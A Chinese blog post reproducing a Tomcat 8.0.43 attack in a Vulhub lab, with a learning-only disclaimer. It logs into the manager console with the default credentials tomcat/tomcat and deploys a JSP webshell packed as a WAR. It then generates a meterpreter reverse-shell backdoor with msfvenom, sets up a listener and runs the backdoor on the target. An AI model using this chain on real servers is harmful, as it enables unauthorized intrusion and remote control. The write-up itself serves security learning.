Tomcat/8.0.43漏洞复现

声明:本文章仅供学习,请勿用于非法操作

环境搭建

漏洞环境是ubuntu+docker+Vulhub靶场。(以前没用过,docker竟然这么好使)
环境搭建比较简单(换源,docker,git,build,up),没有必要写了。

漏洞详情

弱口令 && 后台getshell漏洞
Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。其中,欲访问后台,需要对应用户有相应权限。

复现过程

弱口令

http://ip:8080/manager/html 弱口令:tomcat/tomcat

getshell

登陆后发现上传点
在这里插入图片描述
这里限制是war包,制作war包一种方法是使用命令将webshell打包为war包,另一种方法是先压缩为 .zip文件再把后缀名改为.war

jar -cvf shell.war shell.jsp

上传成功后上方显示OK,会出现如下图中黑色框中的目录在这里插入图片描述
进入目录,在url后加上原来webshell的文件名使其运行http://ip:8080/shell/shell.jsp

我这里使用的是AntSwordWebShell,使用AntSword连接成功
![在这里插入图片描述](https://img-blog.csdnimg.cn/c4bfd64db7ec4b2db0999daddb3e9cd9.png

后门

msf生成后门

使用msfconsole生成一个后门

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.66.128 lport=4444 -f elf > shell.elf

在这里插入图片描述

配置监听

使用与生成后门一样的payload

use exploit/multi/handler 
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.66.128
set lport 4444
run

在这里插入图片描述
Antsword上传执行
在这里插入图片描述

chmod +x shell.elf
./shell.elf

在这里插入图片描述

获得shell

此时msf会进入进入meterpreter shell
在这里插入图片描述
暂时做到这一步,往后的还需要学习。

  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

RICKC131

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值